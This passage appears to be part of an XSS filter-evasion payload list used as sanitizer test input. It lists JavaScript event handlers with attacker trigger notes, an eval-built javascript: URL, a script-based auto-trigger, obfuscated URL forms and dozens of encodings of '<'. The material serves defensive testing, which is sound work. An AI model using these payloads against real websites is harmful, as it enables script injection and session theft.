 5 5 . 	 o n M o u s e L e a v e ( )   ( t h e   a t t a c k e r   w o u l d   n e e d   t o   g e t   t h e   u s e r   t o   m o u s e   o v e r   a n   i m a g e   o r   t a b l e   a n d   t h e n   o f f   a g a i n ) 
 
 5 6 . 	 o n M o u s e M o v e ( )   ( t h e   a t t a c k e r   w o u l d   n e e d   t o   g e t   t h e   u s e r   t o   m o u s e   o v e r   a n   i m a g e   o r   t a b l e ) 
 
 5 7 . 	 o n M o u s e O u t ( )   ( t h e   a t t a c k e r   w o u l d   n e e d   t o   g e t   t h e   u s e r   t o   m o u s e   o v e r   a n   i m a g e   o r   t a b l e   a n d   t h e n   o f f   a g a i n ) 
 
 5 8 . 	 o n M o u s e O v e r ( )   ( c u r s o r   m o v e s   o v e r   a n   o b j e c t   o r   a r e a ) 
 
 5 9 . 	 o n M o u s e U p ( )   ( t h e   a t t a c k e r   w o u l d   n e e d   t o   g e t   t h e   u s e r   t o   c l i c k   o n   a n   i m a g e ) 
 
 6 0 . 	 o n M o u s e W h e e l ( )   ( t h e   a t t a c k e r   w o u l d   n e e d   t o   g e t   t h e   u s e r   t o   u s e   t h e i r   m o u s e   w h e e l ) 
 
 6 1 . 	 o n M o v e ( )   ( u s e r   o r   a t t a c k e r   w o u l d   m o v e   t h e   p a g e ) 
 
 6 2 . 	 o n M o v e E n d ( )   ( u s e r   o r   a t t a c k e r   w o u l d   m o v e   t h e   p a g e ) 
 
 6 3 . 	 o n M o v e S t a r t ( )   ( u s e r   o r   a t t a c k e r   w o u l d   m o v e   t h e   p a g e ) 
 
 6 4 . 	 o n O u t O f S y n c ( )   ( i n t e r r u p t   t h e   e l e m e n t ' s   a b i l i t y   t o   p l a y   i t s   m e d i a   a s   d e f i n e d   b y   t h e   t i m e l i n e ) 
 
 6 5 . 	 o n P a s t e ( )   ( u s e r   w o u l d   n e e d   t o   p a s t e   o r   a t t a c k e r   c o u l d   u s e   t h e   e x e c C o m m a n d ( " P a s t e " )   f u n c t i o n ) 
 
 6 6 . 	 o n P a u s e ( )   ( t h e   o n p a u s e   e v e n t   f i r e s   o n   e v e r y   e l e m e n t   t h a t   i s   a c t i v e   w h e n   t h e   t i m e l i n e   p a u s e s ,   i n c l u d i n g   t h e   b o d y   e l e m e n t ) 
 
 6 7 . 	 o n P r o g r e s s ( )   ( a t t a c k e r   w o u l d   u s e   t h i s   a s   a   f l a s h   m o v i e   w a s   l o a d i n g ) 
 
 6 8 . 	 o n P r o p e r t y C h a n g e ( )   ( u s e r   o r   a t t a c k e r   w o u l d   n e e d   t o   c h a n g e   a n   e l e m e n t   p r o p e r t y ) 
 
 6 9 . 	 o n R e a d y S t a t e C h a n g e ( )   ( u s e r   o r   a t t a c k e r   w o u l d   n e e d   t o   c h a n g e   a n   e l e m e n t   p r o p e r t y ) 
 
 7 0 . 	 o n R e p e a t ( )   ( t h e   e v e n t   f i r e s   o n c e   f o r   e a c h   r e p e t i t i o n   o f   t h e   t i m e l i n e ,   e x c l u d i n g   t h e   f i r s t   f u l l   c y c l e ) 
 
 7 1 . 	 o n R e s e t ( )   ( u s e r   o r   a t t a c k e r   r e s e t s   a   f o r m ) 
 
 7 2 . 	 o n R e s i z e ( )   ( u s e r   w o u l d   r e s i z e   t h e   w i n d o w ;   a t t a c k e r   c o u l d   a u t o   i n i t i a l i z e   w i t h   s o m e t h i n g   l i k e :   < S C R I P T > s e l f . r e s i z e T o ( 5 0 0 , 4 0 0 ) ; < / S C R I P T > ) 
 
 7 3 . 	 o n R e s i z e E n d ( )   ( u s e r   w o u l d   r e s i z e   t h e   w i n d o w ;   a t t a c k e r   c o u l d   a u t o   i n i t i a l i z e   w i t h   s o m e t h i n g   l i k e :   < S C R I P T > s e l f . r e s i z e T o ( 5 0 0 , 4 0 0 ) ; < / S C R I P T > ) 
 
 7 4 . 	 o n R e s i z e S t a r t ( )   ( u s e r   w o u l d   r e s i z e   t h e   w i n d o w ;   a t t a c k e r   c o u l d   a u t o   i n i t i a l i z e   w i t h   s o m e t h i n g   l i k e :   < S C R I P T > s e l f . r e s i z e T o ( 5 0 0 , 4 0 0 ) ; < / S C R I P T > ) 
 
 7 5 . 	 o n R e s u m e ( )   ( t h e   o n r e s u m e   e v e n t   f i r e s   o n   e v e r y   e l e m e n t   t h a t   b e c o m e s   a c t i v e   w h e n   t h e   t i m e l i n e   r e s u m e s ,   i n c l u d i n g   t h e   b o d y   e l e m e n t ) 
 
 7 6 . 	 o n R e v e r s e ( )   ( i f   t h e   e l e m e n t   h a s   a   r e p e a t C o u n t   g r e a t e r   t h a n   o n e ,   t h i s   e v e n t   f i r e s   e v e r y   t i m e   t h e   t i m e l i n e   b e g i n s   t o   p l a y   b a c k w a r d ) 
 
 7 7 . 	 o n R o w s E n t e r ( )   ( u s e r   o r   a t t a c k e r   w o u l d   n e e d   t o   c h a n g e   a   r o w   i n   a   d a t a   s o u r c e ) 
 
 7 8 . 	 o n R o w E x i t ( )   ( u s e r   o r   a t t a c k e r   w o u l d   n e e d   t o   c h a n g e   a   r o w   i n   a   d a t a   s o u r c e ) 
 
 7 9 . 	 o n R o w D e l e t e ( )   ( u s e r   o r   a t t a c k e r   w o u l d   n e e d   t o   d e l e t e   a   r o w   i n   a   d a t a   s o u r c e ) 
 
 8 0 . 	 o n R o w I n s e r t e d ( )   ( u s e r   o r   a t t a c k e r   w o u l d   n e e d   t o   i n s e r t   a   r o w   i n   a   d a t a   s o u r c e ) 
 
 8 1 . 	 o n S c r o l l ( )   ( u s e r   w o u l d   n e e d   t o   s c r o l l ,   o r   a t t a c k e r   c o u l d   u s e   t h e   s c r o l l B y ( )   f u n c t i o n ) 
 
 8 2 . 	 o n S e e k ( )   ( t h e   o n r e v e r s e   e v e n t   f i r e s   w h e n   t h e   t i m e l i n e   i s   s e t   t o   p l a y   i n   a n y   d i r e c t i o n   o t h e r   t h a n   f o r w a r d ) 
 
 8 3 . 	 o n S e l e c t ( )   ( u s e r   n e e d s   t o   s e l e c t   s o m e   t e x t   -   a t t a c k e r   c o u l d   a u t o   i n i t i a l i z e   w i t h   s o m e t h i n g   l i k e :   w i n d o w . d o c u m e n t . e x e c C o m m a n d ( " S e l e c t A l l " ) ; ) 
 
 8 4 . 	 o n S e l e c t i o n C h a n g e ( )   ( u s e r   n e e d s   t o   s e l e c t   s o m e   t e x t   -   a t t a c k e r   c o u l d   a u t o   i n i t i a l i z e   w i t h   s o m e t h i n g   l i k e :   w i n d o w . d o c u m e n t . e x e c C o m m a n d ( " S e l e c t A l l " ) ; ) 
 
 8 5 . 	 o n S e l e c t S t a r t ( )   ( u s e r   n e e d s   t o   s e l e c t   s o m e   t e x t   -   a t t a c k e r   c o u l d   a u t o   i n i t i a l i z e   w i t h   s o m e t h i n g   l i k e :   w i n d o w . d o c u m e n t . e x e c C o m m a n d ( " S e l e c t A l l " ) ; ) 
 
 8 6 . 	 o n S t a r t ( )   ( f i r e s   a t   t h e   b e g i n n i n g   o f   e a c h   m a r q u e e   l o o p ) 
 
 8 7 . 	 o n S t o p ( )   ( u s e r   w o u l d   n e e d   t o   p r e s s   t h e   s t o p   b u t t o n   o r   l e a v e   t h e   w e b p a g e ) 
 
 8 8 . 	 o n S y n c R e s t o r e d ( )   ( u s e r   i n t e r r u p t s   t h e   e l e m e n t ' s   a b i l i t y   t o   p l a y   i t s   m e d i a   a s   d e f i n e d   b y   t h e   t i m e l i n e   t o   f i r e ) 
 
 8 9 . 	 o n S u b m i t ( )   ( r e q u i r e s   a t t a c k e r   o r   u s e r   s u b m i t s   a   f o r m ) 
 
 9 0 . 	 o n T i m e E r r o r ( )   ( u s e r   o r   a t t a c k e r   s e t s   a   t i m e   p r o p e r t y ,   s u c h   a s   d u r ,   t o   a n   i n v a l i d   v a l u e ) 
 
 9 1 . 	 o n T r a c k C h a n g e ( )   ( u s e r   o r   a t t a c k e r   c h a n g e s   t r a c k   i n   a   p l a y L i s t ) 
 
 9 2 . 	 o n U n l o a d ( )   ( a s   t h e   u s e r   c l i c k s   a n y   l i n k   o r   p r e s s e s   t h e   b a c k   b u t t o n   o r   a t t a c k e r   f o r c e s   a   c l i c k ) 
 
 9 3 . 	 o n U R L F l i p ( )   ( t h i s   e v e n t   f i r e s   w h e n   a n   A d v a n c e d   S t r e a m i n g   F o r m a t   ( A S F )   f i l e ,   p l a y e d   b y   a   H T M L + T I M E   ( T i m e d   I n t e r a c t i v e   M u l t i m e d i a   E x t e n s i o n s )   m e d i a   t a g ,   p r o c e s s e s   s c r i p t   c o m m a n d s   e m b e d d e d   i n   t h e   A S F   f i l e ) 
 
 9 4 . 	 s e e k S e g m e n t T i m e ( )   ( t h i s   i s   a   m e t h o d   t h a t   l o c a t e s   t h e   s p e c i f i e d   p o i n t   o n   t h e   e l e m e n t ' s   s e g m e n t   t i m e   l i n e   a n d   b e g i n s   p l a y i n g   f r o m   t h a t   p o i n t .   T h e   s e g m e n t   c o n s i s t s   o f   o n e   r e p e t i t i o n   o f   t h e   t i m e   l i n e   i n c l u d i n g   r e v e r s e   p l a y   u s i n g   t h e   A U T O R E V E R S E   a t t r i b u t e . ) 
 
 
 
 / /   I n v a l i d   c h a r a c t e r s   -   w o u l d n ' t   b e   r e c o g n i s e d   a s   a   t a g   b y   H t m l T a g . P a r s e 
 
 s c r i p t u a l e r t ( E X S S E ) / s c r i p t u 
 
 
 
 / /   A c t i o n S c r i p t   -   N / A 
 
 a = " g e t " ; 
 
 b = " U R L ( \ " " ; 
 
 c = " j a v a s c r i p t : " ; 
 
 d = " a l e r t ( ' X S S ' ) ; \ " ) " ; 
 
 e v a l ( a + b + c + d ) ; 
 
 
 
 / /   T h i s   i s   a   v a l i d   U R L ,   w e   c a n ' t   p r o t e c t   i n s e c u r e   w e b   s i t e s . 
 
 < I M G   S R C = " h t t p : / / w w w . t h e s i t e y o u a r e o n . c o m / s o m e c o m m a n d . p h p ? s o m e v a r i a b l e s = m a l i c i o u s c o d e " > 
 
 
 
 
 
 / /   T h e s e   a r e   j u s t   e x a m p l e s   o f   h o w   t o   o b f u s c a t e   u r l s . 
 
 < A   H R E F = " h t t p : / / 6 6 . 1 0 2 . 7 . 1 4 7 / " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / % 7 7 % 7 7 % 7 7 % 2 E % 6 7 % 6 F % 6 F % 6 7 % 6 C % 6 5 % 2 E % 6 3 % 6 F % 6 D " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / 1 1 1 3 9 8 2 8 6 7 / " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / 0 x 4 2 . 0 x 0 0 0 0 0 6 6 . 0 x 7 . 0 x 9 3 / " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / 0 1 0 2 . 0 1 4 6 . 0 0 0 7 . 0 0 0 0 0 2 2 3 / " > X S S < / A > 
 
 < A   H R E F = " / / w w w . g o o g l e . c o m / " > X S S < / A > 
 
 < A   H R E F = " / / g o o g l e " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / h a . c k e r s . o r g @ g o o g l e " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / g o o g l e : h a . c k e r s . o r g " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / g o o g l e . c o m / " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / w w w . g o o g l e . c o m . / " > X S S < / A > 
 
 < A   H R E F = " h t t p : / / w w w . g o h t t p : / / w w w . g o o g l e . c o m / o g l e . c o m / " > X S S < / A > 
 
 
 
 
 
 / /   T h i s   i s   j u s t   a   l i s t   o f   w a y s   t o   e n c o d e   < .     W e   o n l y   a c c e p t   <   a n y w a y . 
 
 < 
 
 % 3 C 
 
 & l t 
 
 & l t ; 
 
 & L T 
 
 & L T ; 
 
 & # 6 0 
 
 & # 0 6 0 
 
 & # 0 0 6 0 
 
 & # 0 0 0 6 0 
 
 & # 0 0 0 0 6 0 
 
 & # 0 0 0 0 0 6 0 
 
 & # 6 0 ; 
 
 & # 0 6 0 ; 
 
 & # 0 0 6 0 ; 
 
 & # 0 0 0 6 0 ; 
 
 & # 0 0 0 0 6 0 ; 
 
 & # 0 0 0 0 0 6 0 ; 
 
 & # x 3 c 
 
 & # x 0 3 c 
 
 & # x 0 0 3 c 
 
 & # x 0 0 0 3 c 
 
 & # x 0 0 0 0 3 c 
 
 & # x 0 0 0 0 0 3 c 
 
 & # x 3 c ; 
 
 & # x 0 3 c ; 
 
 & # x 0 0 3 c ; 
 
 & # x 0 0 0 3 c ; 
 
 & # x 0 0 0 0 3 c ; 
 
 & # x 0 0 0 0 0 3 c ; 
 
 & # X 3 c 
 
 & # X 0 3 c 
 
 & # X 0 0 3 c 
 
 & # X 0 0 0 3 c 
 
 & # X 0 0 0 0 3 c 
 
 & # X 0 0 0 0 0 3 c 
 
 & # X 3 c ; 
 
 & # X 0 3 c ; 
 
 & # X 0 0 3 c ; 
 
 & # X 0 0 0 3 c ; 
 
 & # X 0 0 0 0 3 c ; 
 
 & # X 0 0 0 0 0 3 c ; 
 
 & # x 3 C 
 
 & # x 0 3 C 
 
 & # x 0 0 3 C 
 
 & # x 0 0 0 3 C 
 
 & # x 0 0 0 0 3 C 
 
 & # x 0 0 0 0 0 3 C 
 
 & # x 3 C ; 
 
 & # x 0 3 C ; 
 
 & # x 0 0 3 C ; 
 
 & # x 0 0 0 3 C ; 
 
 & # x 0 0 0 0 3 C ; 
 
 & # x 0 0 0 0 0 3 C ; 
 
 & # X 3 C 
 
 & # X 0 3 C 
 
 & # X 0 0 3 C 
 
 & # X 0 0 0 3 C 
 
 & # X 0 0 0 0 3 C 
 
 & # X 0 0 0 0 0 3 C 
 
 & # X 3 C ; 
 
 & # X 0 3 C ; 
 
 & # X 0 0 3 C ; 
 
 & # X 0 0 0 3 C ; 
 
 & # X 0 0 0 0 3 C ; 
 
 & # X 0 0 0 0 0 3 C ; 
 
 \ x 3 c 
 
 \ x 3 C 
 
 \ u 0 0 3 c 
 
 